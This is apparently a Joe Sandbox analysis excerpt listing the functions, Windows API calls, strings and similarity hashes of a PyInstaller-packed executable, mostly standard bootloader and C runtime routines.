Part of subcall function 00007FF759975B20: _invalid_parameter_noinfo.LIBCMT ref: 00007FF759975BDF
Part of subcall function 00007FF759975B20: _invalid_parameter_noinfo.LIBCMT ref: 00007FF759975C30

CreateFileW.KERNELBASE ref: 00007FF759975EF2
CreateFileW.KERNEL32 ref: 00007FF759975F42
GetLastError.KERNEL32 ref: 00007FF759975F72
GetFileType.KERNELBASE ref: 00007FF759975F87
GetLastError.KERNEL32 ref: 00007FF759975F91
CloseHandle.KERNEL32 ref: 00007FF759975FC4
CloseHandle.KERNEL32 ref: 00007FF759976127
CreateFileW.KERNEL32 ref: 00007FF75997615C
GetLastError.KERNEL32 ref: 00007FF75997616B

Memory Dump Source

Source File: 00000007.00000002.2084219724.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000007.00000002.2084199609.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084249765.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF759990000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084413235.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff759950000_lib.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: 52a4378cdb78c32285671ba8c66096e739a338fe2dbd84037285ee5c330aca07
Instruction ID: 33bf0895a9f886bd93a0cd8c299c3f1e286768b4eaffff7a83aa6c252b17aafe
Opcode Fuzzy Hash: 52a4378cdb78c32285671ba8c66096e739a338fe2dbd84037285ee5c330aca07
Instruction Fuzzy Hash: AFC1E332B28A8285EB50EF65C4902AC7771FB8AB98F890235DE1E577D5DF38D055C350

Function 00007FF7599517B0 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 144
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_fread_nolock.LIBCMT ref: 00007FF75995185C
_fread_nolock.LIBCMT ref: 00007FF75995190E

Part of subcall function 00007FF75995E6D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF75995E6E4

Strings

MEI, xrefs: 00007FF7599517EF
Cannot read Table of Contents., xrefs: 00007FF759951995
fread, xrefs: 00007FF75995186E
Could not allocate buffer for TOC!, xrefs: 00007FF7599518E3
malloc, xrefs: 00007FF7599518EA
fseek, xrefs: 00007FF759951836
Could not read full TOC!, xrefs: 00007FF759951919
Failed to seek to cookie position!, xrefs: 00007FF75995182F
Failed to read cookie!, xrefs: 00007FF759951867
Error on file., xrefs: 00007FF75995193D

Memory Dump Source

Source File: 00000007.00000002.2084219724.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000007.00000002.2084199609.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084249765.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF759990000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084413235.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff759950000_lib.jbxd

Similarity

API ID: _fread_nolock$_invalid_parameter_noinfo
String ID: Cannot read Table of Contents.$Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
API String ID: 3405171723-4158440160
Opcode ID: 736129cd9be44a1661b95b2ba33e5867236fc23d91738a4fb4e31e423767e709
Instruction ID: 7e04b00b44234568771d1c16493688f22dfe73a36bf073d75e4b116391836054
Opcode Fuzzy Hash: 736129cd9be44a1661b95b2ba33e5867236fc23d91738a4fb4e31e423767e709
Instruction Fuzzy Hash: 46518471A0960296EB64EF24E55017DB3B0FFC8B48B994535DA0D87399EF3CE440C750

Function 00007FF7599512B0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to open archive file!, xrefs: 00007FF7599512E2
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7599513E2
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF75995134C
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF759951312
fread, xrefs: 00007FF7599513E9
malloc, xrefs: 00007FF759951353
fseek, xrefs: 00007FF759951319

Memory Dump Source

Source File: 00000007.00000002.2084219724.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000007.00000002.2084199609.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084249765.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF759990000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084413235.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff759950000_lib.jbxd

Similarity

API ID:
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 0-3659356012
Opcode ID: 4918d2128a8ecda01d9acef525f1e0412807303ad2fd783619b67edb74489764
Instruction ID: 051823fea10bd3e4a084e13e875771eadda11b5dc424cebd1252aa4048aafb8b
Opcode Fuzzy Hash: 4918d2128a8ecda01d9acef525f1e0412807303ad2fd783619b67edb74489764
Instruction Fuzzy Hash: BC416D21A49642A2EA24FF11E9502BAE3B0EF857D4FC84432DE4D47A55FF3DE582C320

Function 00007FF759951000 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 274
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF759952CD0: GetModuleFileNameW.KERNEL32(?,00007FF7599527C9,?,?,?,?,?,?), ref: 00007FF759952D01

SetDllDirectoryW.KERNEL32 ref: 00007FF7599529D5

Part of subcall function 00007FF759955AF0: GetEnvironmentVariableW.KERNEL32(00007FF759952817,?,?,?,?,?,?), ref: 00007FF759955B2A
Part of subcall function 00007FF759955AF0: ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,?), ref: 00007FF759955B47

Strings

Cannot open PyInstaller archive from executable (%s) or external archive (%s), xrefs: 00007FF7599528BE
MEI, xrefs: 00007FF759952917
_PYI_ONEDIR_MODE, xrefs: 00007FF75995282C, 00007FF759952857
_MEIPASS2, xrefs: 00007FF759952803, 00007FF75995286C, 00007FF759952B1B, 00007FF759952B2B
Failed to convert DLL search path!, xrefs: 00007FF7599529BD
Cannot side-load external archive %s (code %d)!, xrefs: 00007FF75995295C

Memory Dump Source

Source File: 00000007.00000002.2084219724.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000007.00000002.2084199609.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084249765.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF759990000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084413235.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff759950000_lib.jbxd

Similarity

API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
API String ID: 2344891160-3602715111
Opcode ID: 67bc1566bc9cc6a33af69393369d413ea151452bcbd73ad5ab79c7a03e38c932
Instruction ID: dd7068710be220c1abbc3ea07a3d919f340b274f3f28caf2709f595dbbd5e807
Opcode Fuzzy Hash: 67bc1566bc9cc6a33af69393369d413ea151452bcbd73ad5ab79c7a03e38c932
Instruction Fuzzy Hash: 27C16021A2C68265FA64BF2195512FFE3B1BFD4784FC85032EA4D4769AEF2CE505C720

Function 00007FF759951050 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF7599510F1
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF7599510B4
1.2.13, xrefs: 00007FF75995107E
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF75995111F
malloc, xrefs: 00007FF7599510F8, 00007FF759951126
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF759951249

Memory Dump Source

Source File: 00000007.00000002.2084219724.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000007.00000002.2084199609.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084249765.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF759990000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084413235.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff759950000_lib.jbxd

Similarity

API ID:
String ID: 1.2.13$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 0-1655038675
Opcode ID: 4cdabe7c4b542fcbeb55cc849069b6767c06bae466cdcbdf6bf18b53adaadb6a
Instruction ID: ea4f4e5a340953bacaff18066637a777c68a5da6ece31f09c28e573c86133112
Opcode Fuzzy Hash: 4cdabe7c4b542fcbeb55cc849069b6767c06bae466cdcbdf6bf18b53adaadb6a
Instruction Fuzzy Hash: 1F519C22A09682A1EA70BF51E5403BAA2A0BFC5798FCC4135DE4E87795FF3CE545C720

Function 00007FF75996DF30 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?,00000000,?,00007FF75996E2CA,?,?,-00000018,00007FF75996A383,?,?,?,00007FF75996A27A,?,?,?,00007FF7599654E2), ref: 00007FF75996E0AC
GetProcAddress.KERNEL32(?,00000000,?,00007FF75996E2CA,?,?,-00000018,00007FF75996A383,?,?,?,00007FF75996A27A,?,?,?,00007FF7599654E2), ref: 00007FF75996E0B8

Strings

api-ms-, xrefs: 00007FF75996DFF6
ext-ms-, xrefs: 00007FF75996E009

Memory Dump Source

Source File: 00000007.00000002.2084219724.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000007.00000002.2084199609.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084249765.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF759990000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084413235.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff759950000_lib.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 5d4014bca18f9f9ee9ee76f308e7221266f6712ab36b1d3e30b229e2872ef72f
Instruction ID: 07998a99c4e0b97ae75273e9face9fd3f230911a098c111fbe83e17da6126c37
Opcode Fuzzy Hash: 5d4014bca18f9f9ee9ee76f308e7221266f6712ab36b1d3e30b229e2872ef72f
Instruction Fuzzy Hash: 4F410161B1AA5281FA12AF56D800675A3B1BFC5BA0FCC4539DD1D8B384EF3CE445C324

Function 00007FF75996B08C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF75996B4B9

Memory Dump Source

Source File: 00000007.00000002.2084219724.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000007.00000002.2084199609.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084249765.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF759990000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084413235.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff759950000_lib.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 6ace3fbad8ddd1cd05ed41dddf3a6c6a2c6962649ba5052cc4813f441b9b9292
Instruction ID: 956f924bc8cd71f1dccfd23491324f7b0afe9ca7069b14b4bda2196306e369c2
Opcode Fuzzy Hash: 6ace3fbad8ddd1cd05ed41dddf3a6c6a2c6962649ba5052cc4813f441b9b9292
Instruction Fuzzy Hash: 2AC1BD22A0C6C691E720AF15D4402BEABB9EBC5B80FDD4135DA4E07795EF7DE8498360

Function 00007FF75996C590 Relevance: 6.2, APIs: 4, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF75996C57B), ref: 00007FF75996C6AC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF75996C57B), ref: 00007FF75996C737

Memory Dump Source

Source File: 00000007.00000002.2084219724.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000007.00000002.2084199609.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084249765.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF759990000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084413235.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff759950000_lib.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 1ee269c4fb3492fdab786e16ea0be33da994e1b3a3006f3c14cd8905a42bf150
Instruction ID: 07e63ef3d95689bfaaca90cfc714a77399111b4c0e1fd7e448602c3b125c1626
Opcode Fuzzy Hash: 1ee269c4fb3492fdab786e16ea0be33da994e1b3a3006f3c14cd8905a42bf150
Instruction Fuzzy Hash: C691B532F1869285F760AF65D4402BDABB4BB95B88F984139EF0E57A84EF3CD441C760

Function 00007FF7599646E8 Relevance: 6.1, APIs: 4, Instructions: 90
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF759964715
CreateFileW.KERNELBASE ref: 00007FF759964754
CloseHandle.KERNEL32 ref: 00007FF759964789

Memory Dump Source

Source File: 00000007.00000002.2084219724.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000007.00000002.2084199609.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084249765.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF759990000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084413235.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff759950000_lib.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: 6f171c56c4af514848e95b4e04b562bbb562cc25ad397f2cc98f1fee1aaa5281
Instruction ID: 95ec346940dc3767e1493005dca74e8fe40ba9d1442f7146d28e4dff3abd19ab
Opcode Fuzzy Hash: 6f171c56c4af514848e95b4e04b562bbb562cc25ad397f2cc98f1fee1aaa5281
Instruction Fuzzy Hash: EE41B062D187C283E710AFA0D510369B371FBD67A4F58A334EA9D03AD5DF6CA4A08720

Function 00007FF75995A51C Relevance: 4.6, APIs: 3, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF75995A530

Part of subcall function 00007FF75995A6FC: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF75995A71E

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF75995A545
__scrt_release_startup_lock.LIBCMT ref: 00007FF75995A5B3

Memory Dump Source

Source File: 00000007.00000002.2084219724.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000007.00000002.2084199609.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084249765.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF759990000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084413235.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff759950000_lib.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 3058843127-0
Opcode ID: 0a8c62a57e2cf59f1561fe537eeb51f2220189f8d74725526a3d26dbeb988a7e
Instruction ID: 596d97b3385904de774f6d0197ec6386e2ce4a59491fa5d8e77f420c4ba02044
Opcode Fuzzy Hash: 0a8c62a57e2cf59f1561fe537eeb51f2220189f8d74725526a3d26dbeb988a7e
Instruction Fuzzy Hash: 56311821E0E14262FA14BF21D5113BAA2F1AFC1784FCC4435EA0D4B297DF2DE845827A

Function 00007FF7599689E8 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF7599689E4), ref: 00007FF7599689F9
TerminateProcess.KERNEL32(?,?,?,00007FF7599689E4), ref: 00007FF759968A04
ExitProcess.KERNEL32 ref: 00007FF759968A13

Memory Dump Source

Source File: 00000007.00000002.2084219724.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000007.00000002.2084199609.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084249765.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF759990000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084413235.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff759950000_lib.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: fc68bfbf785dc4e8d02d30f22ac316467e06faf73d836825e3014864920bd8dd
Instruction ID: 44383caa55dea4aebb1f83e2423ce828fbc50a4e94be81262cc1415ed2fecc7e
Opcode Fuzzy Hash: fc68bfbf785dc4e8d02d30f22ac316467e06faf73d836825e3014864920bd8dd
Instruction Fuzzy Hash: A3D09E10B1968246EA543F719C551B992715FD9756F881438CC4F56393CF3DE44D8261

Function 00007FF75995E6FC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF75995E740
_invalid_parameter_noinfo.LIBCMT ref: 00007FF75995E837

Memory Dump Source

Source File: 00000007.00000002.2084219724.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000007.00000002.2084199609.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084249765.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF759990000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084413235.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff759950000_lib.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: a3600ff4682811ddeb36fb761298261c2e9791cf1ca8f4758584451e9995ac85
Instruction ID: 4693d371c40f99f0e87e07388762a956681c2d9f0a6e38438a0bdbecb70ea885
Opcode Fuzzy Hash: a3600ff4682811ddeb36fb761298261c2e9791cf1ca8f4758584451e9995ac85
Instruction Fuzzy Hash: F451E661B0968176FB78BEA5940067BA2A5BFC4BA4F9C4638DE7C077D9CF3DD4018620

Function 00007FF75996C048 Relevance: 3.1, APIs: 2, Instructions: 74fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE ref: 00007FF75996C0FB
GetLastError.KERNEL32 ref: 00007FF75996C117

Memory Dump Source

Source File: 00000007.00000002.2084219724.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000007.00000002.2084199609.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084249765.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF759990000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084413235.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff759950000_lib.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 48497a76b3055afe52661005fd715ce1d46b06a16acad2e21dfde3d81f02aed8
Instruction ID: 881100bd78271f20c260ec88721a39cf503d334ac130ebe56be376e63ed7c63f
Opcode Fuzzy Hash: 48497a76b3055afe52661005fd715ce1d46b06a16acad2e21dfde3d81f02aed8
Instruction Fuzzy Hash: C431D532619AC19ADB10AF25E8402E9B7B0FB98780F894032EB4D83B55EF3CD555C761

Function 00007FF75996BA48 Relevance: 3.1, APIs: 2, Instructions: 71COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF75996BAC1
GetFileType.KERNELBASE ref: 00007FF75996BAD7

Memory Dump Source

Source File: 00000007.00000002.2084219724.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000007.00000002.2084199609.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084249765.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF759990000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084413235.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff759950000_lib.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 51d66a3ea3a1e5720d3031fa8d01ef1f6d3b4a26eee4bfd04239a76c9c1293a5
Instruction ID: 3f6d6d14e40b9dac3be02c67f35518ae7a2f9a2d3096968201de7115f04ad278
Opcode Fuzzy Hash: 51d66a3ea3a1e5720d3031fa8d01ef1f6d3b4a26eee4bfd04239a76c9c1293a5
Instruction Fuzzy Hash: 76318431A1CB9641E7609F25D590178AAA8FB85BB4FAC1339DB6E073E4DF38E491D310

Function 00007FF75996A188 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF75996A005,?,?,00000000,00007FF75996A0BA), ref: 00007FF75996A1F6
GetLastError.KERNEL32(?,?,?,00007FF75996A005,?,?,00000000,00007FF75996A0BA), ref: 00007FF75996A200

Memory Dump Source

Source File: 00000007.00000002.2084219724.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000007.00000002.2084199609.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084249765.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF759990000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084413235.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff759950000_lib.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification
String ID:
API String ID: 1687624791-0
Opcode ID: 6fe57093fbbb00cdf8389479e1e18e52ea82cce6ea34632ee61e1d7ac301845a
Instruction ID: 028d487cf2a9a71ebec6d1b60a313ce96698d4501bcd7d7892f99d9c2d9853b9
Opcode Fuzzy Hash: 6fe57093fbbb00cdf8389479e1e18e52ea82cce6ea34632ee61e1d7ac301845a
Instruction Fuzzy Hash: BA21CF21B196C241FE50BF61D990279A2B1AFC47A0FAC4235DA2E472C5CF6CA4848322

Function 00007FF75996B764 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF75996B750,00000000,?,?,?,00007FF759951023,00007FF75996B859), ref: 00007FF75996B7B0
GetLastError.KERNEL32(?,?,?,?,?,00007FF75996B750,00000000,?,?,?,00007FF759951023,00007FF75996B859), ref: 00007FF75996B7BA

Memory Dump Source

Source File: 00000007.00000002.2084219724.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

